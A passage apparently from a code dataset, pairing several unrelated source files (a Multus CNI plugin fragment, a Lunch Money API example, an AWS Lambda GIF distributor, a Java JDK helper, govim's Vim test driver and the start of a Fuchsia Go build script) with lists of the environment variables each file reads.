if err != nil {
if len(in.Delegates) == 0 {
// No delegate available so send error
return cmdErr(k8sArgs, "failed to get delegates: %v", err)
}
// Get clusterNetwork before, so continue to delete
logging.Errorf("Multus: failed to get delegates: %v, but continue to delete clusterNetwork", err)
}
} else {
return cmdErr(k8sArgs, "error reading the delegates: %v", err)
}
} else {
defer os.Remove(path)
if err := json.Unmarshal(netconfBytes, &in.Delegates); err != nil {
return cmdErr(k8sArgs, "failed to load netconf: %v", err)
}
// check plugins field and enable ConfListPlugin if there is
for _, v := range in.Delegates {
if len(v.ConfList.Plugins) != 0 {
v.ConfListPlugin = true
}
}
// First delegate is always the master plugin
in.Delegates[0].MasterPlugin = true
}
// set CNIVersion in delegate CNI config if there is no CNIVersion and multus conf have CNIVersion.
for _, v := range in.Delegates {
if v.ConfListPlugin == true && v.ConfList.CNIVersion == "" && in.CNIVersion != "" {
v.ConfList.CNIVersion = in.CNIVersion
v.Bytes, err = json.Marshal(v.ConfList)
}
}
// unset the network status annotation in apiserver, only in case Multus as kubeconfig
if in.Kubeconfig != "" {
if netnsfound {
if !types.CheckSystemNamespaces(string(k8sArgs.K8S_POD_NAMESPACE), in.SystemNamespaces) {
err := k8s.SetNetworkStatus(kubeClient, k8sArgs, nil, in)
if err != nil {
// error happen but continue to delete
logging.Errorf("Multus: error unsetting the networks status: %v", err)
}
}
} else {
logging.Debugf("WARNING: Unset SetNetworkStatus skipped due to netns not found.")
}
}
rt := types.CreateCNIRuntimeConf(args, k8sArgs, "", in.RuntimeConfig)
return delPlugins(exec, args.IfName, in.Delegates, len(in.Delegates)-1, rt, in.BinDir)
}
func main() {
// Init command line flags to clear vendored packages' one, especially in init()
flag.CommandLine = flag.NewFlagSet(os.Args[0], flag.ExitOnError)
// add version flag
versionOpt := false
flag.BoolVar(&versionOpt, "version", false, "Show application version")
flag.BoolVar(&versionOpt, "v", false, "Show application version")
flag.Parse()
if versionOpt == true {
fmt.Printf("%s\n", printVersionString())
return
}
skel.PluginMain(
func(args *skel.CmdArgs) error {
result, err := cmdAdd(args, nil, nil)
if err != nil {
return err
}
return result.Print()
},
func(args *skel.CmdArgs) error {
result, err := cmdGet(args, nil, nil)
if err != nil {
return err
}
return result.Print()
},
func(args *skel.CmdArgs) error { return cmdDel(args, nil, nil) },
cniversion.All, "meta-plugin that delegates to other CNI plugins")
}
|
[
"\"CNI_PATH\"",
"\"CNI_PATH\"",
"\"CNI_PATH\"",
"\"CNI_PATH\"",
"\"CNI_NETNS\"",
"\"CNI_ARGS\""
] |
[] |
[
"CNI_ARGS",
"CNI_NETNS",
"CNI_PATH"
] |
[]
|
["CNI_ARGS", "CNI_NETNS", "CNI_PATH"]
|
go
| 3 | 0 | |
examples/transaction/main.go
|
package main
import (
"context"
"log"
"os"
"github.com/icco/lunchmoney"
)
func main() {
ctx := context.Background()
token := os.Getenv("LUNCHMONEY_TOKEN")
client, _ := lunchmoney.NewClient(token)
t, err := client.GetTransaction(ctx, 1, nil)
if err != nil {
log.Panicf("err: %+v", err)
}
log.Printf("%+v", t)
}
|
[
"\"LUNCHMONEY_TOKEN\""
] |
[] |
[
"LUNCHMONEY_TOKEN"
] |
[]
|
["LUNCHMONEY_TOKEN"]
|
go
| 1 | 0 | |
function/gif-distributor/main.go
|
package main
import (
"context"
"fmt"
"log"
"os"
"time"
baselambda "github.com/aws/aws-lambda-go/lambda"
configv2 "github.com/aws/aws-sdk-go-v2/config"
lambdav2 "github.com/aws/aws-sdk-go-v2/service/lambda"
s3v2 "github.com/aws/aws-sdk-go-v2/service/s3"
"github.com/aws/aws-xray-sdk-go/instrumentation/awsv2"
"github.com/getsentry/sentry-go"
"github.com/dtan4/xlapse/service/lambda"
"github.com/dtan4/xlapse/service/s3"
"github.com/dtan4/xlapse/types"
v1 "github.com/dtan4/xlapse/types/v1"
"github.com/dtan4/xlapse/version"
)
var (
sentryEnabled = false
)
func init() {
if os.Getenv("SENTRY_DSN") != "" {
sentryEnabled = true
}
}
func HandleRequest(ctx context.Context) error {
bucket := os.Getenv("BUCKET")
key := os.Getenv("KEY")
farn := os.Getenv("GIF_MAKER_FUNCTION_ARN")
log.Printf("function version: %q", version.Version)
log.Printf("function built commit: %q", version.Commit)
log.Printf("function built date: %q", version.Date)
log.Printf("bucket: %q", bucket)
log.Printf("key: %q", key)
log.Printf("farn: %q", farn)
if sentryEnabled {
if err := sentry.Init(sentry.ClientOptions{
Dsn: os.Getenv("SENTRY_DSN"),
Transport: &sentry.HTTPSyncTransport{
Timeout: 5 * time.Second,
},
Release: version.Version,
// https://docs.aws.amazon.com/lambda/latest/dg/configuration-envvars.html#configuration-envvars-runtime
ServerName: os.Getenv("AWS_LAMBDA_FUNCTION_NAME"),
}); err != nil {
return fmt.Errorf("cannot initialize Sentry client: %w", err)
}
sentry.ConfigureScope(func(scope *sentry.Scope) {
scope.SetTag("function", "gif-distributor")
})
}
if err := do(ctx, bucket, key, farn); err != nil {
if sentryEnabled {
sentry.CaptureException(err)
}
return err
}
return nil
}
func main() {
baselambda.Start(HandleRequest)
}
func do(ctx context.Context, bucket, key, farn string) error {
cfg, err := configv2.LoadDefaultConfig(ctx)
if err != nil {
return fmt.Errorf("cannot load default AWS SDK config: %w", err)
}
awsv2.AWSV2Instrumentor(&cfg.APIOptions)
s3Client := s3.NewV2(s3v2.NewFromConfig(cfg))
body, err := s3Client.GetObject(ctx, bucket, key)
if err != nil {
return fmt.Errorf("cannot download file from S3 (bucket: %q, key: %q): %w", bucket, key, err)
}
es, err := types.DecodeEntriesYAML(body)
if err != nil {
return fmt.Errorf("cannot decode YAML: %w", err)
}
api := lambdav2.NewFromConfig(cfg)
lambdaClient := lambda.NewV2(api)
now := time.Now()
for _, e := range es {
log.Printf("URL: %q, Bucket: %q, KeyPrefix: %q, Timezone: %q\n", e.GetUrl(), e.GetBucket(), e.GetKeyPrefix(), e.GetTimezone())
loc, err := time.LoadLocation(e.Timezone)
if err != nil {
return fmt.Errorf("cannot load timezone %q: %w", e.Timezone, err)
}
yday := now.In(loc).Add(-24 * time.Hour)
log.Printf("yesterday: %q", yday.String())
req := &v1.GifRequest{
Bucket: e.GetBucket(),
KeyPrefix: e.GetKeyPrefix(),
Year: int32(yday.Year()),
Month: int32(yday.Month()),
Day: int32(yday.Day()),
}
log.Printf("invoking gif-maker function for bucket %q key %q", e.Bucket, e.KeyPrefix)
if err := lambdaClient.InvokeGifMakerFuncs(ctx, req, farn); err != nil {
return fmt.Errorf("cannot invoke gif-maker function: %w", err)
}
}
return nil
}
|
[
"\"SENTRY_DSN\"",
"\"BUCKET\"",
"\"KEY\"",
"\"GIF_MAKER_FUNCTION_ARN\"",
"\"SENTRY_DSN\"",
"\"AWS_LAMBDA_FUNCTION_NAME\""
] |
[] |
[
"BUCKET",
"AWS_LAMBDA_FUNCTION_NAME",
"SENTRY_DSN",
"KEY",
"GIF_MAKER_FUNCTION_ARN"
] |
[]
|
["BUCKET", "AWS_LAMBDA_FUNCTION_NAME", "SENTRY_DSN", "KEY", "GIF_MAKER_FUNCTION_ARN"]
|
go
| 5 | 0 | |
java-tool/src/main/java/com/github/shoothzj/javatool/util/JdkUtil.java
|
package com.github.shoothzj.javatool.util;
import lombok.extern.slf4j.Slf4j;
/**
* @author hezhangjian
*/
@Slf4j
public class JdkUtil {
public static final String JAVA_HOME_PATH = System.getenv("JAVA_HOME");
}
|
[
"\"JAVA_HOME\""
] |
[] |
[
"JAVA_HOME"
] |
[]
|
["JAVA_HOME"]
|
java
| 1 | 0 | |
testdriver/testdriver.go
|
// Package testdriver is a support package for plugins written using github.com/myitcv/govim
package testdriver
import (
"bufio"
"bytes"
"encoding/json"
"flag"
"fmt"
"io"
"io/ioutil"
"net"
"os"
"os/exec"
"path/filepath"
"regexp"
"strconv"
"strings"
"sync"
"time"
"github.com/acarl005/stripansi"
"github.com/kr/pty"
"github.com/myitcv/govim"
"github.com/myitcv/govim/testsetup"
"github.com/rogpeppe/go-internal/semver"
"github.com/rogpeppe/go-internal/testscript"
"gopkg.in/retry.v1"
"gopkg.in/tomb.v2"
)
const (
KeyErrLog = "errLog"
)
// TODO - this code is a mess and needs to be fixed
type TestDriver struct {
govimListener net.Listener
driverListener net.Listener
govim govim.Govim
Log io.Writer
debug Debug
cmd *exec.Cmd
name string
plugin govim.Plugin
quitVim chan bool
quitGovim chan bool
quitDriver chan bool
doneQuitVim chan bool
doneQuitGovim chan bool
doneQuitDriver chan bool
tomb tomb.Tomb
closeLock sync.Mutex
closed bool
}
type Config struct {
Name, GovimPath, TestHomePath, TestPluginPath string
Debug
Log io.Writer
*testscript.Env
Plugin govim.Plugin
}
type Debug struct {
Enabled bool
VimLogLevel int
VimLogPath string
GovimLogPath string
}
func NewTestDriver(c *Config) (*TestDriver, error) {
res := &TestDriver{
quitVim: make(chan bool),
quitGovim: make(chan bool),
quitDriver: make(chan bool),
doneQuitVim: make(chan bool),
doneQuitGovim: make(chan bool),
doneQuitDriver: make(chan bool),
name: c.Name,
plugin: c.Plugin,
}
if c.Log != nil {
res.Log = c.Log
} else {
res.Log = ioutil.Discard
}
gl, err := net.Listen("tcp4", "localhost:0")
if err != nil {
return nil, fmt.Errorf("failed to create listener for govim: %v", err)
}
dl, err := net.Listen("tcp4", ":0")
if err != nil {
return nil, fmt.Errorf("failed to create listener for driver: %v", err)
}
if err := copyDir(c.TestPluginPath, c.GovimPath); err != nil {
return nil, fmt.Errorf("failed to copy %v to %v: %v", c.GovimPath, c.TestPluginPath, err)
}
srcVimrc := filepath.Join(c.GovimPath, "cmd", "govim", "config", "minimal.vimrc")
dstVimrc := filepath.Join(c.TestHomePath, ".vimrc")
if err := copyFile(dstVimrc, srcVimrc); err != nil {
return nil, fmt.Errorf("failed to copy %v to %v: %v", srcVimrc, dstVimrc, err)
}
res.govimListener = gl
res.driverListener = dl
c.Env.Vars = append(c.Env.Vars,
"GOVIMTEST_SOCKET="+res.govimListener.Addr().String(),
"GOVIMTESTDRIVER_SOCKET="+res.driverListener.Addr().String(),
)
_, cmd, err := testsetup.EnvLookupFlavorCommand()
if err != nil {
return nil, err
}
vimCmd := cmd
if e := os.Getenv("VIM_COMMAND"); e != "" {
vimCmd = strings.Fields(e)
}
if c.Debug.Enabled {
res.debug = c.Debug
vimCmd = append(vimCmd, fmt.Sprintf("-V%d%s", c.Debug.VimLogLevel, c.VimLogPath))
}
res.cmd = exec.Command(vimCmd[0], vimCmd[1:]...)
res.cmd.Env = c.Env.Vars
res.cmd.Dir = c.Env.WorkDir
if res.debug.Enabled {
envlist := ""
for _, e := range c.Env.Vars {
if e != ":=:" {
envlist += " " + strings.ReplaceAll(e, " ", `\ `)
}
}
fmt.Printf("Test command:\n==========================\npushd %s && %s %s && popd\n==========================\n", c.Env.WorkDir, envlist, strings.Join(res.cmd.Args, " "))
}
return res, nil
}
func (d *TestDriver) Logf(format string, a ...interface{}) {
fmt.Fprintf(d.Log, format+"\n", a...)
}
func (d *TestDriver) LogStripANSI(r io.Reader) {
scanner := bufio.NewScanner(r)
for {
ok := scanner.Scan()
if !ok {
if scanner.Err() != nil {
fmt.Fprintf(d.Log, "Erroring copying log: %+v\n", scanner.Err())
}
return
}
fmt.Fprint(d.Log, stripansi.Strip(scanner.Text()))
}
}
func copyDir(dst, src string) error {
return filepath.Walk(src, func(path string, info os.FileInfo, err error) error {
switch path {
case filepath.Join(src, ".git"), filepath.Join(src, "cmd", "govim", ".bin"):
return filepath.SkipDir
}
rel := strings.TrimPrefix(path, src)
if strings.HasPrefix(rel, string(os.PathSeparator)) {
rel = strings.TrimPrefix(rel, string(os.PathSeparator))
}
dstpath := filepath.Join(dst, rel)
if info.IsDir() {
return os.MkdirAll(dstpath, 0777)
}
return copyFile(dstpath, path)
})
}
func copyFile(dst, src string) error {
r, err := os.Open(src)
if err != nil {
return err
}
w, err := os.Create(dst)
if err != nil {
return err
}
if _, err := io.Copy(w, r); err != nil {
return err
}
r.Close()
return w.Close()
}
func (d *TestDriver) Run() error {
d.tombgo(d.runVim)
if err := d.listenGovim(); err != nil {
return err
}
select {
case <-d.tomb.Dying():
return d.tomb.Err()
case <-d.govim.Initialized():
}
return nil
}
func (d *TestDriver) Wait() error {
return d.tomb.Wait()
}
func (d *TestDriver) runVim() error {
d.Logf("Starting vim")
thepty, err := pty.Start(d.cmd)
if err != nil {
close(d.doneQuitVim)
err := fmt.Errorf("failed to start %v: %v", strings.Join(d.cmd.Args, " "), err)
d.Logf("error: %+v", err)
return err
}
d.tombgo(func() error {
defer func() {
thepty.Close()
close(d.doneQuitVim)
}()
d.Logf("Waiting for command to exit")
if err := d.cmd.Wait(); err != nil {
select {
case <-d.quitVim:
default:
return fmt.Errorf("vim exited: %v", err)
}
}
return nil
})
if d.debug.Enabled {
d.LogStripANSI(thepty)
} else {
io.Copy(ioutil.Discard, thepty)
}
d.Logf("Vim running")
return nil
}
func (d *TestDriver) Close() {
d.closeLock.Lock()
if d.closed {
d.closeLock.Unlock()
return
}
d.closed = true
d.closeLock.Unlock()
select {
case <-d.doneQuitVim:
default:
close(d.quitVim)
}
select {
case <-d.doneQuitGovim:
default:
close(d.quitGovim)
}
select {
case <-d.doneQuitDriver:
default:
close(d.quitDriver)
}
select {
case <-d.doneQuitVim:
default:
func() {
defer func() {
if r := recover(); r != nil && r != govim.ErrShuttingDown {
panic(r)
}
}()
d.govim.ChannelEx("qall!")
}()
<-d.doneQuitVim
}
select {
case <-d.doneQuitGovim:
default:
d.govimListener.Close()
<-d.doneQuitGovim
}
select {
case <-d.doneQuitDriver:
default:
d.driverListener.Close()
<-d.doneQuitDriver
}
}
func (d *TestDriver) tombgo(f func() error) {
d.tomb.Go(func() error {
err := f()
if err != nil {
fmt.Printf(">>> %v\n", err)
if d.debug.Enabled {
fmt.Printf("Govim debug logs:\n==========================\n")
f, err := os.Open(d.debug.GovimLogPath)
if err != nil {
fmt.Printf("Error opening debug logs: %+v\n", err)
} else {
io.Copy(os.Stdout, f)
}
fmt.Printf("==========================\n")
}
d.Close()
}
return err
})
}
func (d *TestDriver) listenGovim() error {
good := false
defer func() {
if !good {
close(d.doneQuitGovim)
close(d.doneQuitDriver)
}
}()
d.Logf("Waiting for govim connection on %v...", d.govimListener.Addr())
conn, err := d.govimListener.Accept()
if err != nil {
select {
case <-d.quitGovim:
return nil
default:
return fmt.Errorf("failed to accept connection on %v: %v", d.govimListener.Addr(), err)
}
}
d.Logf("Accepted govim connection on %s", d.govimListener.Addr().String())
var log io.Writer = ioutil.Discard
if d.Log != nil {
log = d.Log
}
g, err := govim.NewGovim(d.plugin, conn, conn, log)
if err != nil {
return fmt.Errorf("failed to create govim: %v", err)
}
good = true
d.govim = g
d.tombgo(d.listenDriver)
d.tombgo(d.runGovim)
return nil
}
func (d *TestDriver) runGovim() error {
defer close(d.doneQuitGovim)
if err := d.govim.Run(); err != nil {
select {
case <-d.quitGovim:
default:
return fmt.Errorf("govim Run failed: %v", err)
}
}
return nil
}
func (d *TestDriver) listenDriver() error {
defer close(d.doneQuitDriver)
err := d.govim.DoProto(func() error {
Accept:
for {
d.Logf("Waiting for govim driver connection on %s...", d.driverListener.Addr().String())
conn, err := d.driverListener.Accept()
if err != nil {
select {
case <-d.quitDriver:
break Accept
default:
panic(fmt.Errorf("failed to accept connection to driver on %v: %v", d.driverListener.Addr(), err))
}
}
d.Logf("Accepted driver connection on %v", d.driverListener.Addr())
dec := json.NewDecoder(conn)
var args []interface{}
if err := dec.Decode(&args); err != nil {
panic(fmt.Errorf("failed to read command for driver: %v", err))
}
cmd := args[0]
res := []interface{}{""}
add := func(err error, is ...interface{}) {
toAdd := []interface{}{""}
if err != nil {
toAdd[0] = err.Error()
} else {
toAdd = append(toAdd, is...)
}
res = append(res, toAdd)
}
switch cmd {
case "redraw":
var force string
if len(args) == 2 {
force = args[1].(string)
}
<-d.govim.Schedule(func(g govim.Govim) error {
add(g.ChannelRedraw(force == "force"))
return nil
})
case "ex":
expr := args[1].(string)
<-d.govim.Schedule(func(g govim.Govim) error {
add(g.ChannelEx(expr))
return nil
})
case "normal":
expr := args[1].(string)
<-d.govim.Schedule(func(g govim.Govim) error {
add(g.ChannelNormal(expr))
return nil
})
case "expr":
expr := args[1].(string)
<-d.govim.Schedule(func(g govim.Govim) error {
resp, err := g.ChannelExpr(expr)
add(err, resp)
return nil
})
case "call":
fn := args[1].(string)
<-d.govim.Schedule(func(g govim.Govim) error {
resp, err := g.ChannelCall(fn, args[2:]...)
add(err, resp)
return nil
})
default:
panic(fmt.Errorf("don't yet know how to handle %v", cmd))
}
enc := json.NewEncoder(conn)
if err := enc.Encode(res); err != nil {
panic(fmt.Errorf("failed to encode response %v: %v", res, err))
}
conn.Close()
}
return nil
})
if err != nil {
return fmt.Errorf("%v", err)
}
return nil
}
// Vim is a sidecar that effectively drives Vim via a simple JSON-based
// API
func Vim() (exitCode int) {
logFile := os.Getenv("GOVIMTESTDRIVER_LOG")
var l io.Writer
if logFile != "" {
var err error
l, err = os.OpenFile(logFile, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
if err != nil {
panic(fmt.Sprintf("Could not open log file: %+v", err))
}
} else {
l = ioutil.Discard
}
log := func(format string, args ...interface{}) {
fmt.Fprintf(l, "[vim test client] "+format, args...)
}
log("logging enabled")
defer func() {
r := recover()
if r == nil {
return
}
exitCode = -1
fmt.Fprintln(os.Stderr, r)
log("panic with error: %+v", r)
}()
ef := func(format string, args ...interface{}) {
log(format, args...)
panic(fmt.Sprintf(format, args...))
}
fs := flag.NewFlagSet("vim", flag.PanicOnError)
bang := fs.Bool("bang", false, "expect command to fail")
indent := fs.Bool("indent", false, "pretty indent resulting JSON")
stringout := fs.Bool("stringout", false, "print resulting string rather than JSON encoded version of string")
log("starting vim driver client and parsing flags...")
fs.Parse(os.Args[1:])
args := fs.Args()
fn := args[0]
var jsonArgs []string
for i, a := range args {
if i <= 1 {
uq, err := strconv.Unquote("\"" + a + "\"")
if err != nil {
ef("failed to unquote %q: %v", a, err)
}
jsonArgs = append(jsonArgs, strconv.Quote(uq))
} else {
var buf bytes.Buffer
json.HTMLEscape(&buf, []byte(a))
jsonArgs = append(jsonArgs, buf.String())
}
}
jsonArgString := "[" + strings.Join(jsonArgs, ", ") + "]"
var i []interface{}
if err := json.Unmarshal([]byte(jsonArgString), &i); err != nil {
ef("failed to json Unmarshal %q: %v", jsonArgString, err)
}
switch fn {
case "redraw":
// optional argument of force
switch l := len(args[1:]); l {
case 0:
case 1:
if args[1] != "force" {
ef("unknown argument %q to redraw", args[1])
}
default:
ef("redraw has a single optional argument: force; we saw %v", l)
}
case "ex", "normal", "expr":
switch l := len(args[1:]); l {
case 1:
if _, ok := i[1].(string); !ok {
ef("%v takes a string argument; saw %T", fn, i[1])
}
default:
ef("%v takes a single argument: we saw %v", fn, l)
}
case "call":
switch l := len(args[1:]); l {
case 1:
// no args
if _, ok := i[1].(string); !ok {
ef("%v takes a string as its first argument; saw %T", fn, i[1])
}
case 2:
if _, ok := i[1].(string); !ok {
ef("%v takes a string as its first argument; saw %T", fn, i[1])
}
vs, ok := i[2].([]interface{})
if !ok {
ef("%v takes a slice of values as its second argument; saw %T", fn, i[2])
}
// on the command line we require the args to be specified as an array
// for ease of explanation/documentation, but now we splat the slice
i = append(i[:2], vs...)
default:
ef("%v takes a two arguments: we saw %v", fn, l)
}
}
if bs, err := json.Marshal(i); err != nil {
ef("failed to remarshal json args: %v", err)
} else {
jsonArgString = string(bs)
}
addr := os.Getenv("GOVIMTESTDRIVER_SOCKET")
conn, err := net.Dial("tcp", addr)
if err != nil {
ef("failed to connect to driver on %v: %v", addr, err)
}
if _, err := fmt.Fprintln(conn, jsonArgString); err != nil {
ef("failed to send command %q to driver on: %v", jsonArgString, err)
}
dec := json.NewDecoder(conn)
var resp []interface{}
if err := dec.Decode(&resp); err != nil {
ef("failed to decode response: %v", err)
}
if resp[0] != "" {
// this is a protocol-level error
ef("got error response: %v", resp[0])
}
// resp[1] will be a []intferface{} where the first
// element will be a Vim-level error
vimResp := resp[1].([]interface{})
if err := vimResp[0].(string); err != "" {
// this was a vim-level error
if !*bang {
ef("unexpected command error: %v", err)
}
fmt.Fprintln(os.Stderr, err)
}
if len(vimResp) == 2 {
if *bang {
ef("unexpected command success")
}
if *stringout {
switch vimResp[1].(type) {
case string:
fmt.Print(vimResp[1])
default:
ef("response type is %T, not string", vimResp[1])
}
} else {
enc := json.NewEncoder(os.Stdout)
if *indent {
enc.SetIndent("", " ")
}
if err := enc.Encode(vimResp[1]); err != nil {
ef("failed to format output of JSON: %v", err)
}
}
}
conn.Close()
return 0
}
// Sleep is a convenience function for those odd occasions when you
// need to drop in a sleep, e.g. waiting for CursorHold to trigger
func Sleep(ts *testscript.TestScript, neg bool, args []string) {
if neg {
ts.Fatalf("sleep does not support neg")
}
if len(args) != 1 {
ts.Fatalf("sleep expects a single argument; got %v", len(args))
}
d, err := time.ParseDuration(args[0])
if err != nil {
ts.Fatalf("failed to parse duration %q: %v", args[0], err)
}
time.Sleep(d)
}
func Condition(cond string) (bool, error) {
envf, cmd, err := testsetup.EnvLookupFlavorCommand()
if err != nil {
return false, err
}
var f govim.Flavor
switch {
case strings.HasPrefix(cond, govim.FlavorVim.String()):
f = govim.FlavorVim
case strings.HasPrefix(cond, govim.FlavorGvim.String()):
f = govim.FlavorGvim
default:
return false, fmt.Errorf("unknown condition %v", cond)
}
v := strings.TrimPrefix(cond, f.String())
if envf != f {
return false, nil
}
if v == "" {
return true, nil
}
if v[0] != ':' {
return false, fmt.Errorf("failed to find version separator")
}
v = v[1:]
if !semver.IsValid(v) {
return false, fmt.Errorf("%v is not a valid semver version", v)
}
switch f {
case govim.FlavorVim, govim.FlavorGvim:
cmd := cmd.BuildCommand("-v", "--version")
out, err := cmd.CombinedOutput()
if err != nil {
return false, fmt.Errorf("failed to run %v: %v\n%s", strings.Join(cmd.Args, " "), err, out)
}
version, err := govim.ParseVimVersion(out)
if err != nil {
return false, err
}
return semver.Compare(version, v) >= 0, nil
}
panic("should not reach here")
}
type LockingBuffer struct {
lock sync.Mutex
und bytes.Buffer
NextSearchInx int
}
func (l *LockingBuffer) Write(p []byte) (n int, err error) {
l.lock.Lock()
defer l.lock.Unlock()
return l.und.Write(p)
}
func (l *LockingBuffer) Bytes() []byte {
l.lock.Lock()
defer l.lock.Unlock()
return l.und.Bytes()
}
func ErrLogMatch(ts *testscript.TestScript, neg bool, args []string) {
errLogV := ts.Value(KeyErrLog)
if errLogV == nil {
ts.Fatalf("errlogmatch failed to find %v value", KeyErrLog)
}
errLog, ok := errLogV.(*LockingBuffer)
if !ok {
ts.Fatalf("errlogmatch %v was not the right type", KeyErrLog)
}
fs := flag.NewFlagSet("errlogmatch", flag.ContinueOnError)
fStart := fs.Bool("start", false, "search from beginning, not last snapshot")
fPeek := fs.Bool("peek", false, "do not adjust the NextSearchInx field on the errlog")
fWait := fs.String("wait", "", "retry (with exp backoff) until this time period has elapsed")
fCount := fs.Int("count", -1, "number of instances to wait for/match")
if err := fs.Parse(args); err != nil {
ts.Fatalf("errlogmatch: failed to parse args %v: %v", args, err)
}
if *fWait != "" && neg {
ts.Fatalf("-wait is not compatible with negating the command")
}
switch {
case *fCount < 0:
// not active
default:
if neg {
ts.Fatalf("cannot use -count with negated match")
}
}
if len(fs.Args()) != 1 {
ts.Fatalf("errlogmatch expects a single argument, the regexp to search for")
}
reg, err := regexp.Compile(fs.Args()[0])
if err != nil {
ts.Fatalf("errlogmatch failed to regexp.Compile %q: %v", fs.Args()[0], err)
}
wait := time.Duration(0)
if *fWait != "" {
pwait, err := time.ParseDuration(*fWait)
if err != nil {
ts.Fatalf("errlogmatch: failed to parse -maxwait duration %q: %v", *fWait, err)
}
wait = pwait
}
strategy := retry.LimitTime(wait,
retry.Exponential{
Initial: 10 * time.Millisecond,
Factor: 1.5,
},
)
// If we are not waiting, limit to one-shot (i.e. effectively negate the effect of
// the retry
if *fWait == "" {
strategy = retry.LimitCount(1, strategy)
}
var nextInx int
if !*fPeek {
defer func() {
errLog.NextSearchInx = nextInx
}()
}
var matches [][]int
var searchStart int
for a := retry.Start(strategy, nil); a.Next(); {
toSearch := errLog.Bytes()
nextInx = len(toSearch)
if !*fStart {
searchStart = errLog.NextSearchInx
}
matches = reg.FindAllIndex(toSearch[searchStart:], -1)
if *fCount >= 0 {
if len(matches) != *fCount {
continue
}
if len(matches) > 0 {
nextInx = matches[len(matches)-1][1] + searchStart // End of last match
}
return
}
if matches != nil {
nextInx = matches[len(matches)-1][1] + searchStart // End of last match
if neg {
ts.Fatalf("errlogmatch found unexpected match (%q)", toSearch)
}
// we found a match or the correct count and were expecting it
return
}
}
if *fCount >= 0 {
ts.Fatalf("expected %v matches; found %v", *fCount, len(matches))
}
if !neg {
ts.Fatalf("errlogmatch failed to find match")
}
// we didn't find a match, but this is expected
}
|
[
"\"VIM_COMMAND\"",
"\"GOVIMTESTDRIVER_LOG\"",
"\"GOVIMTESTDRIVER_SOCKET\""
] |
[] |
[
"GOVIMTESTDRIVER_LOG",
"VIM_COMMAND",
"GOVIMTESTDRIVER_SOCKET"
] |
[]
|
["GOVIMTESTDRIVER_LOG", "VIM_COMMAND", "GOVIMTESTDRIVER_SOCKET"]
|
go
| 3 | 0 | |
build/go/build.py
|
#!/usr/bin/env python3.8
# Copyright 2017 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Build script for a Go app.
import argparse
import os
import subprocess
import sys
import string
import shutil
import errno
from gen_library_metadata import get_sources
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'--godepfile', help='Path to godepfile tool', required=True)
parser.add_argument(
'--root-out-dir', help='Path to root of build output', required=True)
parser.add_argument(
'--cc', help='The C compiler to use', required=False, default='cc')
parser.add_argument(
'--cxx', help='The C++ compiler to use', required=False, default='c++')
parser.add_argument(
'--dump-syms', help='The dump_syms tool to use', required=False)
parser.add_argument(
'--objcopy',
help='The objcopy tool to use',
required=False,
default='objcopy')
parser.add_argument('--sysroot', help='The sysroot to use', required=False)
parser.add_argument(
'--target', help='The compiler target to use', required=False)
parser.add_argument(
'--depfile', help='The path to the depfile', required=False)
parser.add_argument(
'--current-cpu',
help='Target architecture.',
choices=['x64', 'arm64'],
required=True)
parser.add_argument(
'--current-os',
help='Target operating system.',
choices=['fuchsia', 'linux', 'mac', 'win'],
required=True)
parser.add_argument('--buildidtool', help='The path to the buildidtool.')
parser.add_argument(
'--build-id-dir', help='The path to the .build-id directory.')
parser.add_argument(
'--go-root', help='The go root to use for builds.', required=True)
parser.add_argument(
'--go-cache', help='Cache directory to use for builds.', required=False)
parser.add_argument(
'--is-test', help='True if the target is a go test', default=False)
parser.add_argument('--buildmode', help='Build mode to use')
parser.add_argument(
'--gcflag',
help='Arguments to pass to Go compiler',
action='append',
default=[])
parser.add_argument(
'--ldflag',
help='Arguments to pass to Go linker',
action='append',
default=[])
parser.add_argument(
'--go-dep-files',
help='List of files describing library dependencies',
nargs='*',
default=[])
parser.add_argument(
'--root-build-dir',
help='Root build directory. Required if --go-dep-files is used.')
parser.add_argument('--binname', help='Output file', required=True)
parser.add_argument(
'--output-path',
help='Where to output the (unstripped) binary',
required=True)
parser.add_argument(
'--stripped-output-path',
help='Where to output a stripped binary, if supplied')
parser.add_argument(
'--verbose',
help='Tell the go tool to be verbose about what it is doing',
action='store_true')
parser.add_argument('--package', help='The package name', required=True)
parser.add_argument(
'--include-dir',
help='-isystem path to add',
action='append',
default=[])
parser.add_argument(
'--lib-dir', help='-L path to add', action='append', default=[])
parser.add_argument('--vet', help='Run go vet', action='store_true')
parser.add_argument(
'--tag', help='Add a go build tag', default=[], action='append')
parser.add_argument(
'--cgo', help='Whether to enable CGo', action='store_true')
args = parser.parse_args()
try:
os.makedirs(args.go_cache)
except OSError as e:
if e.errno == errno.EEXIST and os.path.isdir(args.go_cache):
pass
else:
raise
goarch = {
'x64': 'amd64',
'arm64': 'arm64',
}[args.current_cpu]
goos = {
'fuchsia': 'fuchsia',
'linux': 'linux',
'mac': 'darwin',
'win': 'windows',
}[args.current_os]
build_id_dir = os.path.join(args.root_out_dir, '.build-id')
dist = args.stripped_output_path or args.output_path
# Project path is a package specific gopath, also known as a "project" in go parlance.
project_path = os.path.join(
args.root_out_dir, 'gen', 'gopaths', args.binname)
# Clean up any old project path to avoid leaking old dependencies.
gopath_src = os.path.join(project_path, 'src')
if os.path.exists(gopath_src):
shutil.rmtree(gopath_src)
os.makedirs(gopath_src)
link_to_source_list = []
if args.go_dep_files:
assert args.root_build_dir, (
'--root-build-dir is required with --go-dep-files')
root_build_dir = os.path.abspath(args.root_build_dir)
link_to_source = {}
# Create a GOPATH for the packages dependency tree.
for dst, src in sorted(get_sources(args.go_dep_files).items()):
# Determine if the src path should
# - be mapped as-is which, if src is a directory, includes all subdirectories
# - have its contents enumerated and mapped directly
map_directly = False
if dst.endswith('/...'):
# When a directory and all its subdirectories must be made available, map
# the directory directly.
map_directly = True
# - src can have a '/...' suffix like with 'github.com/google/go-cmp/...'.
# - This means all subpackages are being symlinked to the GOPATH.
# - dst have the suffix when defining a package.
# - src can only have the suffix if dst has it too.
assert dst.endswith('/...') >= src.endswith('/...'), (dst, src)
dst = dst[:-4]
if src.endswith('/...'):
src = src[:-4]
elif os.path.isfile(src):
# When sources are explicitly listed in the BUILD.gn file, each `src` will
# be a path to a file that must be mapped directly.
map_directly = True
# Paths with /.../ in the middle designate go packages that include
# subpackages, but also explicitly list all their source files.
# The construction of these paths is done in the
# godepfile tool, so we remove these sentinel values here.
dst = dst.replace('/.../', '/')
dstdir = os.path.join(gopath_src, dst)
if map_directly:
